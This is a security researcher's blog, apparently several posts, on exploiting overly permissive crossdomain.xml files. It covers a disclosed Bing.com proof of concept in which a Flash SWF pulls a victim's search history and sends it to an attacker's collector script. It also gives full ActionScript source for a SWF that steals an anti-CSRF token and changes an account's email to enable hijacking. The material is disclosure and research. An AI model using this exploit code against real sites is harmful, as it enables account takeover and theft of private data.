<span style="font-family: inherit; margin-left: 1em; margin-right: 1em;"><img height="201" src="https://lh5.googleusercontent.com/dA2PbQdijjEtGFqKq6T0uIxp3D9qnU244RGm0NZnrGy1uYrR1sYpgrrXTgu-SyqB4LHWIlAGHDp0mndRmPT5dThWjoX_2kqVbfECKYMb5AaXRk637adGxsyHsQcfYE30x6mYD00saIw" style="-webkit-transform: rotate(0rad); border: currentColor;" width="624" /><span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
</div>
<div class="separator" style="clear: both; text-align: left;">
<b style="font-weight: normal;"><span style="font-family: inherit;"><br /></span></b></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit;"><span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Step 6: </span></span>Because of the overly permissive crossdomain.xml file, the SWF is able to bypass Same-Origin-Policy and record the server response to the previous request. The SWF sends the data retrieved from <a href="https://www.bing.com/profile/history">https://www.bing.com/profile/history</a> to the attackers data drop page:</div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="font-family: inherit;"><img height="377" src="https://lh5.googleusercontent.com/aTsmPvjb_IU_UBx4O9aORkUXY0XNn6edHNk6lwG0SqX9Lsa2JS29nWUX5dQIqUqGNPB2e_ux5-pXEvcYxVopGyc11SUa9Mj0wv5QmcsDJYgrAZL3cF-skvS_Xdgp4wbn3H-NWaCaaWY" style="-webkit-transform: rotate(0rad); border: currentColor;" width="604" /><span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></span></div>
<div class="separator" style="clear: both; text-align: left;">
<b style="font-weight: normal;"><span style="font-family: inherit;"><br /></span></b></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: inherit;">At this point, the exploitation is over from the perspective of the victim. Let's switch to the attacker's perspective, and look at the stolen data. </span></span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: inherit;"><br /></span></span>
<span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Here is the data collector script on the attacker's server:</span></div>
<div dir="ltr" style="margin-bottom: 0pt; margin-top: 0pt;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://lh4.googleusercontent.com/2AgQLUYxuIelkKOZMKXjb2f9IgbVSj875JUvuEQ9oK-44BY_Jfe3jwS9DTJ2SDuqsTMeDbyuJPDuSSJCc7Dhl5i3j2UvXKcnYezbpNRdgkqZacqdiecQ02NUkaezAU4ZICjCG2kHOhE" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="175" src="https://lh4.googleusercontent.com/2AgQLUYxuIelkKOZMKXjb2f9IgbVSj875JUvuEQ9oK-44BY_Jfe3jwS9DTJ2SDuqsTMeDbyuJPDuSSJCc7Dhl5i3j2UvXKcnYezbpNRdgkqZacqdiecQ02NUkaezAU4ZICjCG2kHOhE" style="-webkit-transform: rotate(0rad); border: currentColor;" width="541" /></a></div>
<span style="line-height: 1; white-space: pre-wrap;">As I mentioned in my previous po</span>st, this php file takes the entire data portion of the incoming HTTP message and writes it to a file in /tmp. You can get a lot fancier with this, such as creating a separate file per victim, or by parsing the file within php and only writing the relevant information to disk, but this was sufficient for the POC that I sent to Microsoft.</div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: inherit; margin-left: 1em; margin-right: 1em;"><span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></span><br /></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
</div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit;"><span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br /></span></span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit;"><span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Step 7:</span><span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> The attacker can now parse the stolen data. The command just parses out the search queries from the source code of the stolen page. What is shown is basically the last 10 or so things I searched for on my Microsoft Surface.</span></span></div>
<div class="separator" style="clear: both; text-align: left;">
<b style="font-weight: normal;"><span style="font-family: inherit;"><br /></span></b></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "courier new" , "courier" , monospace;">root@kali:/var/www# <span style="color: red;">cat /tmp/bing.txt | xmllint --format - | grep "sh_item_qu_query"</span></span></span></div>
<div class="separator" style="clear: both; text-align: left;">
<b style="font-weight: normal;"><span style="font-family: inherit;"><br /></span></b></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: inherit; margin-left: 1em; margin-right: 1em;"><img height="168" src="https://lh3.googleusercontent.com/6RbWfU6BUTwS4uOmhouNjc29v5-6CqDIR9G4c6DBTY5I_OqpBzCkmyuv_qi_q43yinIfOZINvJxIye866D9z-ey6q1Dk5MaFZAn0NhzEDE_lDF2HVdV9O4O0LASbR5Ys9ZotqaWO0E0" style="-webkit-transform: rotate(0rad); border: currentColor;" width="624" /><span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
</div>
<div class="separator" style="clear: both; text-align: left;">
<b style="font-weight: normal;"><span style="font-family: inherit;"><br /></span></b></div>
<div class="separator" style="clear: both; text-align: left;">
<b style="font-weight: normal;"><span style="font-family: inherit;">This next command does the same thing, but it extracts the URL's that I visited as a result of my bing searches:</span></b></div>
<div class="separator" style="clear: both; text-align: left;">
<b style="font-weight: normal;"><span style="font-family: inherit;"><br /></span></b></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "courier new" , "courier" , monospace;">root@kali:/var/www# <span style="color: red;">cat /tmp/bing.txt | xmllint --format - | grep "sh_item_cl_url"</span></span></span></div>
<div class="separator" style="clear: both; text-align: left;">
<b style="font-weight: normal;"><span style="font-family: inherit;"><br /></span></b></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: inherit; margin-left: 1em; margin-right: 1em;"><img height="206" src="https://lh5.googleusercontent.com/X0K0ZkTfZfaILS35kvd6FDhxh3UbcY9TdnEeBatkfz_cmqM-uvBhTGQGxdoSkSd2kUs9IhClBaCS8AQuaogwy5LEuFnKScDvq9pAXgSABnULnf59os1ZlsiaLIGnpqyBqFINmWWPLUo" style="-webkit-transform: rotate(0rad); border: currentColor;" width="580" /><span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
</div>
<div class="separator" style="clear: both; text-align: left;">
<b style="font-weight: normal;"><span style="font-family: inherit;"><br /></span></b></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit;"><span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br /></span></span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit;"><span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">This is where I stopped, but the </span></span><span style="font-family: inherit; line-height: 1; vertical-align: baseline; white-space: pre-wrap;">POC can be extended to include the users entire search history, by using the </span><a href="https://www.bing.com/profile/history/more" style="font-family: inherit; line-height: 1; text-decoration: none;"><span style="text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">https://www.bing.com/profile/history/more</span></a><span style="font-family: inherit; line-height: 1; vertical-align: baseline; white-space: pre-wrap;"> page. In the screenshot below, the t parameter is a timestamp that can be iterated. You can see that by modifying the timestamp, I was able to pull up things I searched for back in December 2012</span><span style="font-family: inherit; line-height: 1; white-space: pre-wrap;">:</span></div>
<div class="separator" style="clear: both; text-align: left;">
<b style="font-weight: normal;"><span style="font-family: inherit;"><br /></span></b></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="font-family: inherit;"><img height="289" src="https://lh6.googleusercontent.com/-JRKoTbMaT7F7jKmV4nmTXo2QikI8xhhhOBtclRdDzFXiNxBjdHdHN22S9zU-C0sTnJ0RuqRBPMxMWD_hpQSplV_5VnVWFjv291GuLRaRn4zcKDHKgOohtB8EFqpeF4LXFztJngf7sc" style="-webkit-transform: rotate(0.00rad); border: currentColor; transform: rotate(0rad);" width="499" /><span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></span></div>
<div class="separator" style="clear: both; text-align: left;">
<b style="font-weight: normal;"><span style="font-family: inherit;"><br /></span></b></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="font-family: inherit;"><span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></span><br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="color: red; line-height: 16px; white-space: pre-wrap;">The malicious SWF could have easily made multiple requests, walking back the timestamp each time, essentially downloading everything the victim has ever searched for on Bing.com. </span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: inherit;"> </span></span><br />
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="line-height: 1;">Here is the ActionScript s</span><span style="font-family: inherit; line-height: 1; white-space: pre-wrap;">ource (BingExternal.as), that once compiled, becomes BingExternal.SWF:</span><br />
<div class="separator" style="clear: both;">
<br /></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="font-family: inherit;"><img height="595" src="https://lh6.googleusercontent.com/WglhVj3lqEBoaxv05r0KRZ6bv9r8eLT5FUdnL6hDWm7Bd-6QFXeSi0evQILaD6F4E0r8Vf3QZ0dMM6TYhf1RuvMveckVjsz-EZmq_6ZP-6u_qA-XJ6j74BwMXetL_j9e61DLX7kpyYA" style="-webkit-transform: rotate(0rad); border: currentColor;" width="559" /></span><br />
<span style="font-family: inherit;"><br /></span></div>
</div>
<span style="color: black; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<div dir="ltr" style="margin-bottom: 0pt; margin-top: 0pt;">
<div style="line-height: normal;">
<span style="color: black; font-family: inherit; line-height: 1; vertical-align: baseline; white-space: pre-wrap;">If you look closely at the very first picture in the POC, you will notice that victim was viewing https://ssl.bing.com/profile/history. You should also notice that the exploit SWF requests the sensitive data from https://www.bing.com/profile/history. This is where I got lucky. </span></div>
<div style="line-height: normal;">
</div>
<div style="line-height: normal;">
I *think* the developers made the following assumption: </div>
<div style="line-height: normal;">
<ul>
<li>When a user is authenticated, we send them to ssl.bing.com, and that crossdomain.xml does not exist, so all is good. </li>
<li>When a user is unauthenticated, we send them to <a href="http://www.bing.com/">www.bing.com</a>. Even though we have a very permissive crossdomain.xml, only unauthenticated users will use this part of the site, so no sensitive information can be stolen via Flash. </li>
</ul>
</div>
So really, I was only able to really exploit the overly permissive crossdomain.xml file and gain access to the sensitive information because the application sent the sensitive history information to authenticated users, even when they requested the data from <a href="http://www.bing.com/profile/history">www.bing.com/profile/history</a>. If Bing told authenticated users to use ssl.bing.com/profile/history or get lost, I would not have had a very exciting demo. <br />
<br />
Questions? Concerns? Leave me a note in the comments! <br />
<h2>
Related Work: </h2>
<div>
<ul>
<li><a href="http://sethsec.blogspot.com/2014/03/exploiting-misconfigured-crossdomainxml.html">Exploiting misconfigured crossdomain.xml files</a></li>
<li><a href="http://sethsec.blogspot.com/2014/03/exploiting-insecure-crossdomain.html">Exploiting insecure crossdomain policies to bypass anti-CSRF tokens</a></li>
<li><a href="http://sethsec.blogspot.com/2014/07/crossdomain-bing.html">Real world exploitation of a misconfigured crossdomain.xml - Bing.com</a></li>
<li><a href="http://sethsec.blogspot.com/2014/07/cve-2014-2227.html">AirVision Controller v2.1.3 - Overly Permissive default crossdomain.xml</a></li>
<li><a href="http://sethsec.blogspot.com/2014/10/bsidesdc-2014.html">BSides DC 2014 - SWF Seeking Lazy Admin for Cross-Domain Action</a></li>
</ul>
</div>
</div>
</div>
Seth Arthttp://www.blogger.com/profile/05253599496757968918noreply@blogger.com3tag:blogger.com,1999:blog-5890567984672491244.post-24500768871721119502014-03-28T14:37:00.003-04:002014-03-28T14:37:39.039-04:00Exploiting insecure crossdomain policies to bypass anti-CSRF tokensIn my last post, I mentioned that if a site hosts an insecure crossdomain.xml file, you can exploit that flaw to bypass same origin policy and among other things, you can read anti-CSRF tokens. Because your Flash object can read the anti-CSRF token, it can extract the token from the response and use it in future requests. In fact, this is almost identical to how you can bypass CSRF tokens with XSS.<br />
<br />
I recently came across a popular website that met these criteria, and I created a POC to send to the security team. The site protected itself against CSRF using anti-CSRF tokens, but they had a wide open crossdomain.xml file. I'll post the details later, but I wanted to drop the template here, in the event anyone wants to give it a try: <br />
<!-- HTML generated using hilite.me --><br />
<div style="background: #f8f8f8; border-width: .1em .1em .1em .8em; border: solid gray; overflow: auto; padding: .2em .8em; width: auto;">
<pre style="line-height: 125%; margin: 0;"><span style="color: #008800; font-style: italic;">// Original POC Author: Gursev Singh Kalra (gursev.kalra@foundstone.com)</span>
<span style="color: #008800; font-style: italic;">// Modified to bypass antiCSRF tokens: Seth Art (sethsec@gmail.com)</span>
<span style="color: #008800; font-style: italic;">// </span><span style="color: #00a000;">BypassCSRFchangeEmailAddress</span><span style="color: #008800; font-style: italic; line-height: 125%;">.as</span>
<span style="color: #aa22ff; font-weight: bold;">package</span> <span style="color: #666666;">{</span>
<span style="color: #aa22ff; font-weight: bold;">import</span> <span style="color: blue; font-weight: bold;">flash.display.Sprite</span><span style="color: #666666;">;</span>
<span style="color: #aa22ff; font-weight: bold;">import</span> <span style="color: blue; font-weight: bold;">flash.events.</span><span style="color: #666666;">*;</span>
<span style="color: #aa22ff; font-weight: bold;">import</span> <span style="color: blue; font-weight: bold;">flash.net.URLRequestMethod</span><span style="color: #666666;">;</span>
<span style="color: #aa22ff; font-weight: bold;">import</span> <span style="color: blue; font-weight: bold;">flash.net.URLRequest</span><span style="color: #666666;">;</span>
<span style="color: #aa22ff; font-weight: bold;">import</span> <span style="color: blue; font-weight: bold;">flash.net.URLLoader</span><span style="color: #666666;">;</span>
<span style="color: #aa22ff; font-weight: bold;">public</span> <span style="color: #aa22ff; font-weight: bold;">class</span> BypassCSRFchangeEmailAddress <span style="color: #aa22ff; font-weight: bold;">extends</span> Sprite <span style="color: #666666;">{</span>
<span style="color: #aa22ff; font-weight: bold;">public</span> <span style="color: #aa22ff; font-weight: bold;">function </span><span style="color: #00a000; line-height: 125%;">BypassCSRFchangeEmailAddress</span><span style="color: #666666; line-height: 125%;">()</span><span style="line-height: 125%;"> </span><span style="color: #666666; line-height: 125%;">{</span>
<span style="color: #008800; font-style: italic;">// Target URL from where the data is to be retrieved</span>
<span style="color: #aa22ff; font-weight: bold;">var</span> readFrom:<span style="color: #00bb00; font-weight: bold;">String</span> <span style="color: #666666;">=</span> <span style="color: #bb4444;">"https://www.secret-site.com/account/edit"</span><span style="color: #666666;">;</span>
<span style="color: #aa22ff; font-weight: bold;">var</span> readRequest:<span style="color: #00bb00; font-weight: bold;">URLRequest</span> <span style="color: #666666;">=</span> <span style="color: #aa22ff; font-weight: bold;">new</span> <span style="color: #00bb00; font-weight: bold;">URLRequest</span><span style="color: #666666;">(</span>readFrom<span style="color: #666666;">);</span>
<span style="color: #aa22ff; font-weight: bold;">var</span> getLoader:<span style="color: #00bb00; font-weight: bold;">URLLoader</span> <span style="color: #666666;">=</span> <span style="color: #aa22ff; font-weight: bold;">new</span> <span style="color: #00bb00; font-weight: bold;">URLLoader</span><span style="color: #666666;">();</span>
getLoader<span style="color: #666666;">.</span><span style="color: #bb4444;">addEventListener</span><span style="color: #666666;">(</span>Event<span style="color: #666666;">.</span><span style="color: #bb4444;">COMPLETE</span><span style="color: #666666;">,</span> eventHandler<span style="color: #666666;">);</span>
<span style="color: #aa22ff; font-weight: bold;">try</span> <span style="color: #666666;">{</span>
getLoader<span style="color: #666666;">.</span><span style="color: #bb4444;">load</span><span style="color: #666666;">(</span>readRequest<span style="color: #666666;">);</span>
<span style="color: #666666;">}</span> <span style="color: #aa22ff; font-weight: bold;">catch</span> <span style="color: #666666;">(</span>error<span style="color: #666666;">:</span>Error<span style="color: #666666;">)</span> <span style="color: #666666;">{</span>
<span style="color: #00a000;">trace</span><span style="color: #666666;">(</span><span style="color: #bb4444;">"Error loading URL: "</span> <span style="color: #666666;">+</span> error<span style="color: #666666;">);</span>
<span style="color: #666666;">}</span>
<span style="color: #666666;">}</span>
<span style="color: #aa22ff; font-weight: bold;">private</span> <span style="color: #aa22ff; font-weight: bold;">function </span><span style="color: #00a000;">eventHandler</span><span style="color: #666666;">(</span>event<span style="color: #666666;">:</span><span style="color: #00bb00; font-weight: bold;">Event</span><span style="color: #666666;">):</span><span style="color: #00bb00; font-weight: bold;">void</span> <span style="color: #666666;">{</span>
<span style="color: #008800; font-style: italic;">// This assigns the reponse from the first </span></pre>
<pre style="margin: 0px;"><span style="line-height: 125%;"> </span><span style="color: #008800; font-style: italic; line-height: 125%;">// request to "reponse". </span><span style="color: #008800; font-style: italic; line-height: 125%;">The antiCSRF token is</span><span style="line-height: 125%;">
</span><span style="color: #008800; font-style: italic; line-height: 125%;">// somwhere in this reponse</span><span style="line-height: 125%;">
</span><span style="color: #aa22ff; font-weight: bold; line-height: 125%;">var</span><span style="line-height: 125%;"> response:</span><span style="color: #00bb00; font-weight: bold; line-height: 125%;">String</span><span style="line-height: 125%;"> </span><span style="color: #666666; line-height: 125%;">=</span><span style="line-height: 125%;"> event</span><span style="color: #666666; line-height: 125%;">.</span><span style="color: #bb4444; line-height: 125%;">target</span><span style="color: #666666; line-height: 125%;">.</span><span style="color: #bb4444; line-height: 125%;">data</span><span style="color: #666666; line-height: 125%;">;</span><span style="line-height: 125%;">
</span><span style="color: #008800;"><span style="line-height: 125%;"><i>// This line looks for the line in the </i></span><span style="line-height: 16.25px;"><i>response</i></span><span style="line-height: 125%;"><i> </i></span></span></pre>
<pre style="margin: 0px;"><span style="color: #008800;"><span style="line-height: 125%;"><i> //that contains the CSRF token</i></span></span><span style="line-height: 125%;">
</span><span style="color: #aa22ff; font-weight: bold; line-height: 125%;">var</span><span style="line-height: 125%;"> CSRF:</span><span style="color: #00bb00; font-weight: bold; line-height: 125%;">Array</span><span style="line-height: 125%;"> </span><span style="color: #666666; line-height: 125%;">=</span><span style="line-height: 125%;"> response</span><span style="color: #666666; line-height: 125%;">.</span><span style="color: #bb4444; line-height: 125%;">match</span><span style="color: #666666; line-height: 125%;">(/</span><span style="line-height: 125%;">CSRFToken</span><span style="color: #666666; line-height: 125%;">.*/);</span><span style="line-height: 125%;">
</span><span style="color: #008800; font-style: italic; line-height: 125%;">// This line extracts the value of the CSRF token, </span></pre>
<pre style="margin: 0px;"><span style="color: #008800; font-style: italic; line-height: 125%;"> // and assigns it to "token"</span><span style="line-height: 125%;">
</span><span style="color: #aa22ff; font-weight: bold; line-height: 125%;">var</span><span style="line-height: 125%;"> token:</span><span style="color: #00bb00; font-weight: bold; line-height: 125%;">String</span><span style="line-height: 125%;"> </span><span style="color: #666666; line-height: 125%;">=</span><span style="line-height: 125%;"> CSRF</span><span style="color: #666666; line-height: 125%;">[0].</span><span style="line-height: 125%;">split</span><span style="color: #666666; line-height: 125%;">(</span><span style="color: #bb4444; line-height: 125%;">"\""</span><span style="color: #666666; line-height: 125%;">)[2];</span><span style="line-height: 125%;">
</span><span style="color: #008800; font-style: italic; line-height: 125%;">// These next two lines create the prefix and the </span></pre>
<pre style="margin: 0px;"><span style="color: #008800; font-style: italic; line-height: 125%;"> // suffix for the POST request</span><span style="line-height: 125%;">
</span><span style="color: #aa22ff; font-weight: bold; line-height: 125%;">var</span><span style="line-height: 125%;"> prefix:</span><span style="color: #00bb00; font-weight: bold; line-height: 125%;">String</span><span style="line-height: 125%;"> </span><span style="color: #666666; line-height: 125%;">=</span><span style="line-height: 125%;"> </span><span style="color: #bb4444; line-height: 125%;">"CSRFToken="</span><span style="line-height: 125%;">
</span><span style="color: #aa22ff; font-weight: bold; line-height: 125%;">var</span><span style="line-height: 125%;"> suffix:</span><span style="color: #00bb00; font-weight: bold; line-height: 125%;">String</span><span style="line-height: 125%;"> </span><span style="color: #666666; line-height: 125%;">=</span><span style="line-height: 125%;"> </span><span style="color: #bb4444; line-height: 125%;">"&first_name=CSRF&last_name=CSRF&email=sethsec%40gmail.com"</span><span style="line-height: 125%;">
</span><span style="color: #008800; font-style: italic; line-height: 125%;">// This section sets up a new URLRequest object and</span></pre>
<pre style="margin: 0px;"><span style="color: #008800; font-style: italic; line-height: 125%;"> // sets the method to post </span><span style="line-height: 125%;">
</span><span style="color: #aa22ff; font-weight: bold; line-height: 125%;">var</span><span style="line-height: 125%;"> sendTo:</span><span style="color: #00bb00; font-weight: bold; line-height: 125%;">String</span><span style="line-height: 125%;"> </span><span style="color: #666666; line-height: 125%;">=</span><span style="line-height: 125%;"> </span><span style="color: #bb4444; line-height: 125%;">"https://www.secret-site.com/account/edit/"</span><span style="line-height: 125%;">
</span><span style="color: #aa22ff; font-weight: bold; line-height: 125%;">var</span><span style="line-height: 125%;"> sendRequest:</span><span style="color: #00bb00; font-weight: bold; line-height: 125%;">URLRequest</span><span style="line-height: 125%;"> </span><span style="color: #666666; line-height: 125%;">=</span><span style="line-height: 125%;"> </span><span style="color: #aa22ff; font-weight: bold; line-height: 125%;">new</span><span style="line-height: 125%;"> </span><span style="color: #00bb00; font-weight: bold; line-height: 125%;">URLRequest</span><span style="color: #666666; line-height: 125%;">(</span><span style="line-height: 125%;">sendTo</span><span style="color: #666666; line-height: 125%;">);</span><span style="line-height: 125%;">
sendRequest</span><span style="color: #666666; line-height: 125%;">.</span><span style="color: #bb4444; line-height: 125%;">method</span><span style="line-height: 125%;"> </span><span style="color: #666666; line-height: 125%;">=</span><span style="line-height: 125%;"> URLRequestMethod</span><span style="color: #666666; line-height: 125%;">.</span><span style="color: #bb4444; line-height: 125%;">POST</span><span style="color: #666666; line-height: 125%;">;</span><span style="line-height: 125%;">
</span><span style="color: #008800; font-style: italic; line-height: 125%;">// This next line sets the data portion of the POST </span></pre>
<pre style="margin: 0px;"><span style="color: #008800; font-style: italic; line-height: 125%;"> // request to the "prefix" + "token" + "suffix"</span><span style="line-height: 125%;">
sendRequest</span><span style="color: #666666; line-height: 125%;">.</span><span style="color: #bb4444; line-height: 125%;">data</span><span style="line-height: 125%;"> </span><span style="color: #666666; line-height: 125%;">=</span><span style="line-height: 125%;"> prefix</span><span style="color: #666666; line-height: 125%;">.</span><span style="color: #bb4444; line-height: 125%;">concat</span><span style="color: #666666; line-height: 125%;">(</span><span style="line-height: 125%;">token</span><span style="color: #666666; line-height: 125%;">,</span><span style="line-height: 125%;">suffix</span><span style="color: #666666; line-height: 125%;">)</span><span style="line-height: 125%;">
</span><span style="color: #008800; font-style: italic; line-height: 125%;">// Time to create the URLLoader object and send the </span></pre>
<pre style="margin: 0px;"><span style="color: #008800; font-style: italic; line-height: 125%;"> // POST request containing the CSRF token</span><span style="line-height: 125%;">
</span><span style="color: #aa22ff; font-weight: bold; line-height: 125%;">var</span><span style="line-height: 125%;"> sendLoader:</span><span style="color: #00bb00; font-weight: bold; line-height: 125%;">URLLoader</span><span style="line-height: 125%;"> </span><span style="color: #666666; line-height: 125%;">=</span><span style="line-height: 125%;"> </span><span style="color: #aa22ff; font-weight: bold; line-height: 125%;">new</span><span style="line-height: 125%;"> </span><span style="color: #00bb00; font-weight: bold; line-height: 125%;">URLLoader</span><span style="color: #666666; line-height: 125%;">();</span><span style="line-height: 125%;">
</span><span style="color: #aa22ff; font-weight: bold; line-height: 125%;">try</span><span style="line-height: 125%;"> </span><span style="color: #666666; line-height: 125%;">{</span><span style="line-height: 125%;">
sendLoader</span><span style="color: #666666; line-height: 125%;">.</span><span style="color: #bb4444; line-height: 125%;">load</span><span style="color: #666666; line-height: 125%;">(</span><span style="line-height: 125%;">sendRequest</span><span style="color: #666666; line-height: 125%;">);</span><span style="line-height: 125%;">
</span><span style="color: #666666; line-height: 125%;">}</span><span style="line-height: 125%;"> </span><span style="color: #aa22ff; font-weight: bold; line-height: 125%;">catch</span><span style="line-height: 125%;"> </span><span style="color: #666666; line-height: 125%;">(</span><span style="line-height: 125%;">error</span><span style="color: #666666; line-height: 125%;">:</span><span style="line-height: 125%;">Error</span><span style="color: #666666; line-height: 125%;">)</span><span style="line-height: 125%;"> </span><span style="color: #666666; line-height: 125%;">{</span><span style="line-height: 125%;">
</span><span style="color: #00a000; line-height: 125%;">trace</span><span style="color: #666666; line-height: 125%;">(</span><span style="color: #bb4444; line-height: 125%;">"Error loading URL: "</span><span style="line-height: 125%;"> </span><span style="color: #666666; line-height: 125%;">+</span><span style="line-height: 125%;"> error</span><span style="color: #666666; line-height: 125%;">);</span><span style="line-height: 125%;">
</span><span style="color: #666666; line-height: 125%;">}</span><span style="line-height: 125%;">
</span><span style="color: #666666; line-height: 125%;">}</span><span style="line-height: 125%;">
</span><span style="color: #666666; line-height: 125%;">}</span><span style="line-height: 125%;">
</span><span style="color: #666666; line-height: 125%;">}</span></pre>
</div>
<br />
When the victim loads the the compiled Flash object, Flash object does 3 things:<br />
<br />
1) The SWF sends a request from the victim's browser to a page that returns the CSRF token<br />
2) The SWF grabs the CSRF token from the returned page<br />
3) The SWF sends a second request, using the stolen CSRF token, that changes the email address on the account to the attackers email address<br />
<br />
At that point the attacker just needs to fill out the forget password feature using their own email address, and they will be able to hijack the account. <br />
<br />
<br />Seth Arthttp://www.blogger.com/profile/05253599496757968918noreply@blogger.com0tag:blogger.com,1999:blog-5890567984672491244.post-52724050871249125962014-03-14T08:46:00.000-04:002016-11-10T23:13:34.746-05:00Exploiting misconfigured crossdomain.xml filesAn overly permissive crossdomain.xml file on a domain that serves sensitive content is a major security risk. It exposes the domain hosting the improperly configured crossomain.xml file to information disclosure and request forgery. Attackers cannot only forge requests, they can read responses. This means the attacker can retrieve any information the authenticated user has access to, including account information, documents and files, and anti-CSRF tokens if they are used.<br />
<div>
<span style="font-weight: normal;"><span style="background-color: white; color: #222222; font-family: "verdana" , sans-serif; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;"><br /></span></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-NEyToNgS5Pk/Ux8d16DNVLI/AAAAAAAAAMI/nqGYenqlois/s1600/open_crossdomain.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: "verdana" , sans-serif;"><img border="0" src="https://2.bp.blogspot.com/-NEyToNgS5Pk/Ux8d16DNVLI/AAAAAAAAAMI/nqGYenqlois/s1600/open_crossdomain.png" /></span></a></div>
<div>
<h2>
<span style="font-size: large;">History</span></h2>
</div>
<div>
This is an old vulnerability. How old? 8 years old. Here is very rough outline of prior research/public discussion:</div>
<br />
<b>2006: </b><a href="http://shiflett.org/blog/2006/sep/the-dangers-of-cross-domain-ajax-with-flash">Chris</a> <a href="http://shiflett.org/blog/2006/oct/the-crossdomain.xml-witch-hunt">Shiflett</a>, <a href="http://blog.monstuff.com/archives/000302.html">Julien Couvreur</a>, and <a href="http://jeremiahgrossman.blogspot.com/2006/10/crossdomainxml-statistics.html">Jeremiah Grossman</a> started talking about this publicly. <br />
<b>2008:</b> Jeremiah Grossman <a href="http://jeremiahgrossman.blogspot.com/2008/05/crossdomainxml-invites-cross-site.html">revisited</a> the issue.<br />
<b>2010:</b> <a href="http://erlend.oftedal.no/blog/?blogid=102">Erlend Ofede</a>l wrote about it, and <a href="https://www.blackhat.com/presentations/bh-dc-10/Bailey_Mike/BlackHat-DC-2010-Bailey-Neat-New-Ridiculous-flash-hacks-slides.pdf">Mike Bailey</a> gave talk at Blackhat DC.<br />
